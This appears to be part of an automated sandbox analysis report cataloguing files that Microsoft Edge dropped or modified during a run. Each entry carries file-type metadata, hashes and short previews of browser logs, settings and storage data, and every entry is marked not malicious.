                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):375520
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.354138441688892
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:bA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:bFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                                          MD5:4E9E9A6B793B27FCDE5440499688C90D
                                                                                                                                                                                                                                                                                                                          SHA1:B3F090F51FD31AF07C3F7AFB67A0AA8DCFECB2BE
                                                                                                                                                                                                                                                                                                                          SHA-256:E7EFC3CE6D0C8E668DBD6434F82F4AB9B520D3F5045DD14D38C31F81EF384E74
                                                                                                                                                                                                                                                                                                                          SHA-512:609D766A61680B0D14A443E81F389DF774121B2631DACF5B83F3D79B7E836F618A25033053554166193B004AE57ADBB891AD9E9C8D72BEAA0CEC0592753B81AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):311
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.127352767191647
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uiUG81923oH+Tcwtk2WwnvB2KLlguPjN+q2P923oH+Tcwtk2WwnvIFUv:76u3GxYebkxwnvFLuu5+v4YebkxwnQF2
                                                                                                                                                                                                                                                                                                                          MD5:1745597870DE650C87D984911CC25F07
                                                                                                                                                                                                                                                                                                                          SHA1:4C451ABF83E0910B5A98C646C7481A41A7E2F219
                                                                                                                                                                                                                                                                                                                          SHA-256:C3215ABBF58E154B20200FCDAF5E020AD5647F781CFA5B358986B087BFD95085
                                                                                                                                                                                                                                                                                                                          SHA-512:1EF95C3C75829F1F936E3659BAD6D00647FEE01B8835EC5688B4C2AD00B4C440C7954E3A42AD838E1CEF379FACED6AF681DCA24FB45BF45DF12456CE555DD91C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:10.065 16cc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/12-11:23:10.098 16cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                                                          Size (bytes):358860
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.324607873618632
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RC:C1gAg1zfv6
                                                                                                                                                                                                                                                                                                                          MD5:B8BD4CFE5BCEAD97C1DF4AF8F54BB7EF
                                                                                                                                                                                                                                                                                                                          SHA1:CE939AB231C62E2BAA418CCF36A9E578E1125775
                                                                                                                                                                                                                                                                                                                          SHA-256:3D566B539D83CEF215855958850DDC55068C98750987A9868DC26253E7EAE578
                                                                                                                                                                                                                                                                                                                          SHA-512:C0D7927E26C4F66B85A42D9C9FB0F61A11AA491EFF530C5CDAE2D5CAA41EF498413FDCB0A117586C4551F7C461B9F710D5508152C6FDBA5643FA09CFB813B7E5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0616676033368915
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6ur0Vq2P923oH+Tcwt8aPrqIFUtQuuGZmwuuu6kwO923oH+Tcwt8amLJ:76urWv4YebL3FUtQul/uu35LYebQJ
                                                                                                                                                                                                                                                                                                                          MD5:91213AD5C7689DD7842309E78B811A26
                                                                                                                                                                                                                                                                                                                          SHA1:67759177366DA96F9B6211D1CE4CC9C8F8788620
                                                                                                                                                                                                                                                                                                                          SHA-256:60B6B764E1E97D01CFAC6CFE7757CAFCEC709D550E1A6B87BCF76906603A6C11
                                                                                                                                                                                                                                                                                                                          SHA-512:E4BC06F95D2704D9C6A5C65400396DAD88469447AB37BFA4F7856A62340BB1B743DAF85887122DB04BDF7468BAA30046473356B48D8B3E311F0F836E40941853
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.209 1c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/12-11:23:05.210 1c90 Recovering log #3.2025/01/12-11:23:05.210 1c90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0616676033368915
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6ur0Vq2P923oH+Tcwt8aPrqIFUtQuuGZmwuuu6kwO923oH+Tcwt8amLJ:76urWv4YebL3FUtQul/uu35LYebQJ
                                                                                                                                                                                                                                                                                                                          MD5:91213AD5C7689DD7842309E78B811A26
                                                                                                                                                                                                                                                                                                                          SHA1:67759177366DA96F9B6211D1CE4CC9C8F8788620
                                                                                                                                                                                                                                                                                                                          SHA-256:60B6B764E1E97D01CFAC6CFE7757CAFCEC709D550E1A6B87BCF76906603A6C11
                                                                                                                                                                                                                                                                                                                          SHA-512:E4BC06F95D2704D9C6A5C65400396DAD88469447AB37BFA4F7856A62340BB1B743DAF85887122DB04BDF7468BAA30046473356B48D8B3E311F0F836E40941853
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.209 1c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/12-11:23:05.210 1c90 Recovering log #3.2025/01/12-11:23:05.210 1c90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                          MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                          SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                          SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                          SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.115311223075755
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uvVdq2P923oH+Tcwt865IFUtQuvXhFZZmwuuvXhFzkwO923oH+Tcwt86+ULJ:76uvVdv4Yeb/WFUtQuvXhFZ/uuvXhFzB
                                                                                                                                                                                                                                                                                                                          MD5:C85AE05D29E9863C87AA576F29AEE724
                                                                                                                                                                                                                                                                                                                          SHA1:793381FF91286661E6B495F543C52A08212D37B6
                                                                                                                                                                                                                                                                                                                          SHA-256:A6D2B566DBBD3DAFAAFAFF721A35E2F4464801D67CF488DF265A43CCE7F92091
                                                                                                                                                                                                                                                                                                                          SHA-512:16FF102859CBE4A9A8F5A7C58D681CE3E494FC9B56CE0CC6EC8578E9A99ABBE99BC6AF3F82846240A6331E4284F64D937CE68D98EC37C0927F145BB06DFAFDCB
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.242 1c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/12-11:23:05.243 1c90 Recovering log #3.2025/01/12-11:23:05.243 1c90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.115311223075755
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uvVdq2P923oH+Tcwt865IFUtQuvXhFZZmwuuvXhFzkwO923oH+Tcwt86+ULJ:76uvVdv4Yeb/WFUtQuvXhFZ/uuvXhFzB
                                                                                                                                                                                                                                                                                                                          MD5:C85AE05D29E9863C87AA576F29AEE724
                                                                                                                                                                                                                                                                                                                          SHA1:793381FF91286661E6B495F543C52A08212D37B6
                                                                                                                                                                                                                                                                                                                          SHA-256:A6D2B566DBBD3DAFAAFAFF721A35E2F4464801D67CF488DF265A43CCE7F92091
                                                                                                                                                                                                                                                                                                                          SHA-512:16FF102859CBE4A9A8F5A7C58D681CE3E494FC9B56CE0CC6EC8578E9A99ABBE99BC6AF3F82846240A6331E4284F64D937CE68D98EC37C0927F145BB06DFAFDCB
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.242 1c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/12-11:23:05.243 1c90 Recovering log #3.2025/01/12-11:23:05.243 1c90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1254
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                                          MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                                          SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                                          SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                                          SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):324
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.102210559118586
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6u9+q2P923oH+Tcwt8NIFUtQu2WZmwuu9VkwO923oH+Tcwt8+eLJ:76u9+v4YebpFUtQu2W/uu9V5LYebqJ
                                                                                                                                                                                                                                                                                                                          MD5:B8E205E35A9C8C3BD93CDC24233B7D0D
                                                                                                                                                                                                                                                                                                                          SHA1:6955C14E46238C78CAED4B3AC3B11887A402159C
                                                                                                                                                                                                                                                                                                                          SHA-256:7B0C2883C8882580E0EB296514D4F65931A99382BD7B5B3E0D03A89B0523FD00
                                                                                                                                                                                                                                                                                                                          SHA-512:FCF428DD991717B3229690B388511FB3C32E9B222BCACAE9EA9CD2E0DBBCDFAA1C456EACE99543456DA75370D3DA85B006B686D7D413897C6955711EBE5FC507
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.939 1fcc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/12-11:23:05.939 1fcc Recovering log #3.2025/01/12-11:23:05.939 1fcc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):429
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                                          MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                                          SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                                          SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                                          SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                                                          Size (bytes):8720
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.2181161368834022
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:6lljtFlljq7A/mhWJFuQ3yy7IOWUut4dweytllrE9SFcTp4AGbNCV9RUINr:6/I75fOkt4d0Xi99pEYPr
                                                                                                                                                                                                                                                                                                                          MD5:D55954E40030BA9687758CA7965B5CAE
                                                                                                                                                                                                                                                                                                                          SHA1:E8DDD3804B1AC87473263D8E0900A62B0F3E0319
                                                                                                                                                                                                                                                                                                                          SHA-256:E10D93B55541B2D52B46A1C9D5789DDA6297DAD90E59E93396D9563EB5AD827B
                                                                                                                                                                                                                                                                                                                          SHA-512:40F17F20091CC487AC928FCD7DC88CDCFD9F9C70CD1199ED64B70876F28A9C483E82839F07931A3FB4DB9159E8A14E116A9AEFF0E59914BCE34CD5EB629F8024
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):115717
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                          MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                          SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                          SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                          SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6481262007522295
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:aj9P0LEcAjlrP/KbtpQkQerE773pL9hCgam6ItRKToaAu:adyKlrP/se2E7Pv9RKcC
                                                                                                                                                                                                                                                                                                                          MD5:DF0D2FCFE368ECEEB78C13B004DAEDBD
                                                                                                                                                                                                                                                                                                                          SHA1:1E9121546F3F0758130C2A37F274C56BCE00B702
                                                                                                                                                                                                                                                                                                                          SHA-256:91ED1A0AB9A23419FBD76C4A2435EDC1CCBAB5FC481528342F34159558CA8ABB
                                                                                                                                                                                                                                                                                                                          SHA-512:13179A41D9084C4778EFD801A91E2D18B87C5BA662BF08170564DEB9742BD0F93B00D538413B6E6A8D38171E7EFC190E17EAB09C3B396835FC02E9F6A2E5E474
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):408
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2514575839803666
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:76uiFqv4Yeb8rcHEZrELFUtQux/uur5LYeb8rcHEZrEZSJ:76uL4Yeb8nZrExgQuEu9LYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                          MD5:331FF322FD130132E5C0829D59AB4A89
                                                                                                                                                                                                                                                                                                                          SHA1:B47B5D506983DB4A024E1904AD110D3638E7A098
                                                                                                                                                                                                                                                                                                                          SHA-256:2ED72C2AD949E8FF10B6CD45924F48C5669F305EA7D469A5C2F541F13ED06966
                                                                                                                                                                                                                                                                                                                          SHA-512:91A0F3C05BF21BA93B0B611B9A76D524785659EEEE6A15F9E5699D0835A454CE2DA65617C21F190CD81A4C1335983CE4E5D7C39E6F61913AC0BF31EC6AE08682
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:09.096 1fc4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/12-11:23:09.097 1fc4 Recovering log #3.2025/01/12-11:23:09.097 1fc4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1600
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.589247332906856
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:6Z4YuW8WCXZGWV03Sx49RHHS2/48ylsQhyG:6vuVWQ0MeTQ8osM
                                                                                                                                                                                                                                                                                                                          MD5:FEF68719FDD61DB34E59BB5B45585B90
                                                                                                                                                                                                                                                                                                                          SHA1:FB7E5C3DEC7AAC4FEA4F6CBD8D258CDB997FF75B
                                                                                                                                                                                                                                                                                                                          SHA-256:D0F09C1CF3E06203867354DE8D1A7CF5D6B1EDC3D3FFDC9E2659031FAD77BA90
                                                                                                                                                                                                                                                                                                                          SHA-512:F6F6211F105F0AC112EC1E483C7156872CCD11BF27A4C8532FCC74D2D55C4B74237CBC8483FFF6297BDC70D7F569EF2B94419096B5C943FD0DB60317F36AF04D
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:...9................VERSION.1..META:https://ntp.msn.com............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":370}.!_https://ntp.msn.com..LastKnownPV..1736698993186.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736698994208.._https://ntp.msn.com..MUID!.0DA5835E35016A581E46962C34736B24.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736698993253,"schedule":[4,-1,34,-1,-1,-1,12],"scheduleFixed":[4,-1,34,-1,-1,-1,12],"simpleSchedule":[26,47,22,23,37,44,19]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736698993158.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250110.471"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):333
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.091662443254109
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uvHAq2P923oH+Tcwt8a2jMGIFUtQuMZmwuuezkwO923oH+Tcwt8a2jMmLJ:76uvHAv4Yeb8EFUtQuM/uuG5LYeb8bJ
                                                                                                                                                                                                                                                                                                                          MD5:8251B55A952EA7076567D3CA1D6B82D7
